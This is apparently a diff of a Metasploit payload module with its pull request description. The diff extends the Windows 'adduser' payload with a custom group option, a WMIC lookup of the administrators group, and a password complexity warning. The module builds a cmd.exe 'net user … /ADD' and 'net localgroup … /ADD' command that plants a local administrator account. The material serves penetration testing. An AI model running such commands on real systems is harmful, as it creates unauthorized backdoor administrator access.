-			'Platform'      => 'win',
-			'Arch'          => ARCH_X86,
-			'Privileged'    => true))
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'          => 'Windows Execute net user /ADD',
+            'Version'       => '$Revision$',
+            'Description'   => 'Create a new user and add them to local administration group',
+            'Author'        => ['hdm','Chris John Riley'],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            'Privileged'    => true))
 
-		# Register command execution options
-		register_options(
-			[
-				OptString.new('USER', [ true, "The username to create",     "metasploit" ]),
-				OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
-			], self.class)
+        # Register command execution options
+        register_options(
+            [
+                OptString.new('USER',   [ true, "The username to create",     "metasploit" ]),
+                OptString.new('PASS',   [ true, "The password for this user", "metasploit" ]),
+                OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
+                OptBool.new('WMIC',     [ true, "Use WMIC on the target system to find the name of the local administrators group", false ]),
+            ], self.class)
 
-		# Hide the CMD option...this is kinda ugly
-		deregister_options('CMD')
-	end
+        # Hide the CMD option...this is kinda ugly
+        deregister_options('CMD')
+    end
 
-	#
-	# Override the exec command string
-	#
-	def command_string
-		user = datastore['USER'] || 'metasploit'
-		pass = datastore['PASS'] || ''
+    #
+    # Override the exec command string
+    #
+    def command_string
+        user = datastore['USER'] || 'metasploit'
+        pass = datastore['PASS'] || ''
+        cust = datastore['CUSTOM'] || ''
+        wmic = datastore['WMIC']
 
-		if(pass.length > 14)
-			raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
-		end
+        if(pass.length > 14)
+            raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
+        end
 
-		return "cmd.exe /c net user #{user} #{pass} /ADD && " +
-			"net localgroup Administrators #{user} /ADD"
-	end
+        #
+        # Check if the PASS parameter meets commonly used complexity requirements and inform the user (no blocking implemented)
+        #
+        if(pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/)
+            print_status("Password passes complexity requirements")
+        else
+            print_error("Password failed complexity requirements, this command may fail on systems that require complex passwords")
+        end
+
+        if not cust.empty?
+            print_status("Using custom group name #{cust}")
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup \"#{cust}\" #{user} /ADD"
+        elsif wmic
+            print_status("Using WMIC to discover the administrative group name")
+            return "cmd.exe /c \"FOR /F \"usebackq skip=1\" %g IN (`wmic group where sid^='S-1-5-32-544' get name`)\"; do " +
+                "net user #{user} #{pass} /ADD && "+
+                "net localgroup %g #{user} /ADD"
+        else
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup Administrators #{user} /ADD"
+        end
+    end
 
 end


### PR DESCRIPTION
Replaces issue number 6518/6519 (now that i've finally got GIT to work!)
- Base32 support added to /lib/rex/text.rb
- dns/icmp/http payload delivery modules

I'm happy to provide a client-side program that takes advantage of these modules (off list)... however they should be simple enough to test using wireshark and some correctly formulated queries with dig, hping, netcat.

---

Added additions to the /windows/adduser and cmd/windows/adduser payload

CUSTOM group name
WMIC method of resolving the Administrators group SID (in cases where the group has been renamed or the system language isn't English).
COMPLEXITY checks against the provided password (warns if the PASS value doesn't meet complexity rules)
